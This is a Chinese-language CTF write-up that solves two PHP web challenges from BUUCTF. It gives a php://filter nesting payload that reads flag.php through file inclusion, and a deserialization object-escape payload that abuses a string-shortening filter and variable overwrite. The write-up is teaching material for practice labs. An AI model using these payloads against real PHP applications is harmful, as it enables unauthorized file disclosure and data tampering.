BUUCTF 25

知识点

• strpos() 函数

1. 语法：strpos(string,find,start)
2. 参数：
3. 作用：

反序列化的对象逃逸问题一般分为两种~~，首先是过滤函数分为两种情况

• 第一种为关键词数增加
  例如： where->hacker，这样词数由五个增加到6个
• 第二种为关键词数减少
  例如：直接过滤掉一些关键词

25-1 [BSidesCF 2020]Had a bad day

做题思路

首先点开发现两个按钮，然后点开之后会出现图片，url中 

猜测有注入，或文件包含,弹出include报错，那就是文件包含了

利用php://filter伪协议读取源码 

报错了发现后缀多了，于是去掉后缀，base64解码得到源码

  
    
    
    
    
    
    
    
  
  
    

      

        

          Had a bad day?
          

        

      
      

      

        

          

          

            

            
            
Cheer up!
              

                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              
              

              
			
          

              Woofers
              Meowers
          

          
        
      
    
    
  

审计发现 传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件，我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag 用index不可以得到下面的东西，但是没报错，所以应该是和代码有关,导致显示不同

发现显示不一样了，打开源码发现这个 

是否能读取这个flag，便继续利用php://filter伪协议读取flag,这里还涉及到php伪协议的嵌套使用

/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag

最后解密即可得到flag

25-2 [安洵杯 2019]easy_serialize_php

做题思路

审计代码，首先发现

于是直接查看phpinfo,直接搜一些敏感点，fopen、disable_、root等等。第二行看到了独特的文件名。

拿到文件名，接下来就该想办法读取了

读取是有前提的，$function我们可以通过 $f 直接赋值，么的影响。

现在我们就要base64_decode($userinfo[‘img’])=d0g3_f1ag.php。

那么就要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==。

而$userinfo又是通过$serialize_info反序列化来的。

$serialize_info又是通过session序列化之后再过滤得来的。

session里面的img在这里赋值，我们指定的话会被sha1哈希，到时候就不能被base64解密了。这里就到了一个难点了。

我们看到上面的过滤函数，会把一些长度的字符替换为0，这个和之前做过的这个题有异曲同工之处[0CTF 2016]piapiapia WP(详细)，不过之前的那个题是变长，这个是变短。

直接看payload分析比较容易理解：

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

因为有变量覆盖漏洞，所以它可以直接这样被赋值进去。

然后session被序列化之后会变成这样：

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

然后这串字符串经过过滤函数之后，会变成：

a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

可以看到，24后面的6个flag被替换为空了，但是指定的长度还是24，怎么办呢？它会往后吞，不管什么符号，都吞掉24个字符。吞完之后变成了这样。

a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

 

看，括号里的字符串就变成了user的值，这时候我们自己输入的function参数和img参数，就把真的参数替代掉了

注意格式，我看别人的WP没有function参数也是可以的，但是必须要凑够3个参数，因为一开始序列化的时候指定了有3个参数 。

get传 f=show_image,
post传：

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

查看源代码发现了新的文件，

不能直接打开，给它进行base64编码（编码的时候 “/” 也要一起带进去），然后替换掉img的值，计算一下长度，都是20，那不用改长度了。

所以最后的结果是：
get传 f=show_image,
post传：

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}